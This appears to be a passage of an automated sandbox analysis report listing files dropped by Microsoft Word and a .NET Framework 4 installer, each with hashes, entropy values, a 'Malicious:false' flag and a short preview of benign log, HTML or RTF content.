                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".B.A.q.k.1.X.4.O.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.H.A.b.P.x.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{062733CD-DFD5-4F9D-AE47-7912E1F80176}.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                  Entropy (8bit):1.3043886928434667
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:mEMEEEul39lCgK1qViAC4lA1iAPldpwEcJEhqEX:c3YPf48txBVX
                                                                                                                                                                  MD5:B3768CEF11C3C6D62430AEF24A79420D
                                                                                                                                                                  SHA1:4FA4277B918631D87921AAA565FA616EBFE00534
                                                                                                                                                                  SHA-256:279922D2055D098C0FDDAA4200669C7F06C974997E45654B3F02A170D942BAE7
                                                                                                                                                                  SHA-512:29F8E45D080DD45E55963409CACF9A431AE6CC76A2A9AC0C2E303A51C0C1F1BE15E7C88061803862A2192A00A00E86DC92E10567BEB2F5E0AF10424161BAEDFB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B2EBF3F6-B0B5-4C45-8848-750A91E31A28}.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                  Entropy (8bit):1.3030575809016531
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ml+lGl+l+l+l1PPPXll1l7lhlJvl5hzldlxpxl/b1l/pl/Ppl/NllXljl/tl/rl9:mEMEEEul39lCgK1qVQvFq61kcL6+COX
                                                                                                                                                                  MD5:5535CF97B6419116D9017B00204F79A0
                                                                                                                                                                  SHA1:173D163896E6929D5488490EDEBC0E23F100CADA
                                                                                                                                                                  SHA-256:8294FB1217A148A60575F20B88D0172962A4D33D6C0D0DC7B35C42FEFA64649C
                                                                                                                                                                  SHA-512:566131C4421C06758D888C23B9ED589B933DED347FDCE4510A390EF67306B6664FA4F5A7F9FFD1FD4687E199897AD824BC41425274FB337C8D309B2791273CC1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{DC53A3F2-08D1-44C5-85DE-5BE3A802B760}.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2190
                                                                                                                                                                  Entropy (8bit):2.337646512799098
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:EsqvOGLPYhLmW0VMFqVGRXOruJuNfb6q4LTsqFd:XqmG7YhyWUGerugNzXiTjd
                                                                                                                                                                  MD5:CF995F89C2083BA07E18D59DF7F78DCF
                                                                                                                                                                  SHA1:A6C7AD586B1AF9ED41CA39073F0C50DD021E79DC
                                                                                                                                                                  SHA-256:CCB4ED10900D02FAC8BCF795ED7AE7D678408F25B3F12442D31ECD41E0208B9F
                                                                                                                                                                  SHA-512:43453B351A9639AA37F8C3CFFB82CBE1C3CCE4191F66E55F9262C55467FE398FFCAC4EABC0A1F9325A5F9C25D1B5B23AFC215B808AC7B661F7A5B86D8489AA45
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:D.e.t.a.i.l.s.....1....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<..CJ..KH..OJ+.QJ+.^J+.aJ...CJ..KH..OJ+.QJ+.^J+.aJ...!5..>*.CJ..K

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{E30C2ADB-FC2F-4AD0-9C71-08B947557242}.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2190
                                                                                                                                                                  Entropy (8bit):2.337646512799098
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:EsqvOGLPYhLmW0VMFqVGRXOruJuNfb6q4LTsqFd:XqmG7YhyWUGerugNzXiTjd
                                                                                                                                                                  MD5:CF995F89C2083BA07E18D59DF7F78DCF
                                                                                                                                                                  SHA1:A6C7AD586B1AF9ED41CA39073F0C50DD021E79DC
                                                                                                                                                                  SHA-256:CCB4ED10900D02FAC8BCF795ED7AE7D678408F25B3F12442D31ECD41E0208B9F
                                                                                                                                                                  SHA-512:43453B351A9639AA37F8C3CFFB82CBE1C3CCE4191F66E55F9262C55467FE398FFCAC4EABC0A1F9325A5F9C25D1B5B23AFC215B808AC7B661F7A5B86D8489AA45
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:D.e.t.a.i.l.s.....1....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<..CJ..KH..OJ+.QJ+.^J+.aJ...CJ..KH..OJ+.QJ+.^J+.aJ...!5..>*.CJ..K

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1699033965471479800_6430D5B4-2D76-44E3-A952-AE49D3F227BB.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.004031818010834895
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:vozICxK+wQ8dum7KOwKT1vKVbQ8dDJhbMKFyQ8d+5slHKiUQ8dub9Er4QEKrBvQq:RaKTEhmtgr43AMhiB3
                                                                                                                                                                  MD5:E5DC2CD5F223535B96B6D4F713856B08
                                                                                                                                                                  SHA1:277B95FB3F9D3D08D06588186AA5D5E264EADCC5
                                                                                                                                                                  SHA-256:BD7B77D57D6D7A2D7CAE0AE5FFC1266FED3B98F6C4B6794147F33F4E1AA63495
                                                                                                                                                                  SHA-512:0EB2383680991DD06589B0A36EB593FA22CA9B27B1F5CED31711297250A34C36D37DB4603D5D0FC0728AF61054A69195A0575109BA4E0CEE5AEAE146252E1CA5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/03/2023 17:52:45.882.WINWORD (0x1EE0).0x1F34.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2023-11-03T17:52:45.882Z","Contract":"Office.System.Activity","Activity.CV":"tNUwZHYt40SpUq5J0/Inuw.7.1","Activity.Duration":231,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/03/2023 17:52:45.897.WINWORD (0x1EE0).0x1F34.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2023-11-03T17:52:45.897Z","Contract":"Office.System.Activity","Activity.CV":"tNUwZHYt40SpUq5J0/Inuw.7","Activity.Duration":2733,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1699033965472205200_6430D5B4-2D76-44E3-A952-AE49D3F227BB.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                  SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                  SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                  SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1699033967854965700_C2BCB3FD-122D-4531-B75C-EF381B6F2C51.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:ASCII text, with very long lines (632), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.00868390162584169
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:m0bzTngviZg9UdkqfdAqFq/qeIXPo392il1AsBmKIKgcgsFBUH/J:RfTgaq9qH1lAy/O3/Aom7KgtmBkR
                                                                                                                                                                  MD5:BFBD2477C1A4202BA148BC8C5E09DB58
                                                                                                                                                                  SHA1:BAEDDE48B827A6FFFF350CD319091A2B997BD757
                                                                                                                                                                  SHA-256:852A472A14E9BE37E83C0B0E6DB58001380AE445CC7E00447172153EDFCBD35C
                                                                                                                                                                  SHA-512:56A5C70710458FBED37429B5BEFDF99F991A81F472127D92A537CB2F32201EF6D9FA887FF2873392E5F652555464F88FCDFFA1BDA56D4076A9242F8D19EFE1FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/03/2023 17:52:48.052.WINWORD (0x1A88).0x1A10.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2023-11-03T17:52:48.052Z","Contract":"Office.System.Activity","Activity.CV":"/bO8wi0SMUW3XO84G28sUQ.7.1","Activity.Duration":181,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/03/2023 17:52:48.052.WINWORD (0x1A88).0x1A10.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":25,"Time":"2023-11-03T17:52:48.052Z","Contract":"Office.System.Activity","Activity.CV":"/bO8wi0SMUW3XO84G28sUQ.7","Activity.Duration":504,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDi

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1699033967855834800_C2BCB3FD-122D-4531-B75C-EF381B6F2C51.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                  MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                  SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                  SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                  SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HFID088.tmp.html

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16118
                                                                                                                                                                  Entropy (8bit):3.6434775915277604
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                                                                                                  MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                                                                                                  SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                                                                                                  SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                                                                                                  SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Microsoft .NET Framework 4 Client Profile Setup_20231103_185225970.html

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (502), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64690
                                                                                                                                                                  Entropy (8bit):3.703036371687032
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:fdsOT01KcBUFJFEWUxFzvHFknJCNoOxQEmG:fdsOTLyUFJFEWUxFzvltQ8
                                                                                                                                                                  MD5:038267D078FC439278A5B2B37ACE608E
                                                                                                                                                                  SHA1:CCF2147193F137A78296413FF5960CF2DFFF4B3B
                                                                                                                                                                  SHA-256:5830F304DEBEAA123B059B995B48DA51770B1C28555F2CC44ED607242490AB2A
                                                                                                                                                                  SHA-512:F5B34AC612CB764B08CEA7F7BE2A49C6E41CD29C0DC4AD8CE8F1436A7B41CDCC47B4E10991274457E519D2508988C568599C1B6A0E7C3A826ACE62297C22930D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Setup_20231103_185224033.html

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (388), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):52808
                                                                                                                                                                  Entropy (8bit):3.7043651092385477
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHj5hMznJCNoO:fdsOT01KcBUFJFEWUxFzvHFknJCNoO
                                                                                                                                                                  MD5:81FB40A1E1149CD50834716278782E92
                                                                                                                                                                  SHA1:15C0BE35802680892FD16B0A9C3E1FC5DDE4F271
                                                                                                                                                                  SHA-256:762BD4C27C59267F807CAA547D5719B3CF20D289F977431E98639106C8B49B08
                                                                                                                                                                  SHA-512:6DBA882CEED7897E216A76186497E845F520C2BBB49293526045F44C37A61B192394593B1714DC7CF492C18484CDB11A1BA847E0ED818176D16900EDF8D9819A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TFR143B.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):723
                                                                                                                                                                  Entropy (8bit):5.101748329011036
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYsj+M28lIz2:MNifQallTv3MswTbY3jznIz2
                                                                                                                                                                  MD5:64F07DCAFFD1516EEE785F9060C9079E
                                                                                                                                                                  SHA1:14761003DB721312678C30FE43AF6AB09BF4597C
                                                                                                                                                                  SHA-256:5C76A2F0825F1FB8D9DF89E7BC1EAD8545EE6BAB2FDDDA4672F0EF76B0EB1D7B
                                                                                                                                                                  SHA-512:02FA34D04E24CF1D04084032EF3B8AF30622178150B3FC5C587A90DB92F98115E11851F5988A1925A105F2F0D31506E4C1E105147B720DFDAE4319DBBBE573BE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 Client Profile has already been installed on this computer.\par..\pard\par..\par..\par..}...

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TFR2B8E.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):723
                                                                                                                                                                  Entropy (8bit):5.101748329011036
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYsj+M28lIz2:MNifQallTv3MswTbY3jznIz2
                                                                                                                                                                  MD5:64F07DCAFFD1516EEE785F9060C9079E
                                                                                                                                                                  SHA1:14761003DB721312678C30FE43AF6AB09BF4597C
                                                                                                                                                                  SHA-256:5C76A2F0825F1FB8D9DF89E7BC1EAD8545EE6BAB2FDDDA4672F0EF76B0EB1D7B
                                                                                                                                                                  SHA-512:02FA34D04E24CF1D04084032EF3B8AF30622178150B3FC5C587A90DB92F98115E11851F5988A1925A105F2F0D31506E4C1E105147B720DFDAE4319DBBBE573BE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 Client Profile has already been installed on this computer.\par..\pard\par..\par..\par..}...

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                  Entropy (8bit):5.1658109182427445
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:5jtavRecyB0MkjwVztjxOvXLK4FqLhjHIWtIjHU4I6:5jtavxCSwVztlOvu4gIWW3
                                                                                                                                                                  MD5:3D5D79495DBD9AF2632E873F69AA71B3
                                                                                                                                                                  SHA1:BC561435756D316E01617EA7032D4C2BE9483A42
                                                                                                                                                                  SHA-256:CA663DAC6574385BFF4B987F2533F08E57B9B5F1E9BECD2F2BE040F613AC2117
                                                                                                                                                                  SHA-512:998C9C8171C994C37F9E29C93FA0616A6C7F5810970CEA377BD678DF0608A3D00A47D3E02848D923B32D8CCB2F4A852DC96A0E7210B4F775E3997EA3D64F1E3E
                                                                                                                                                                  Malicious:false
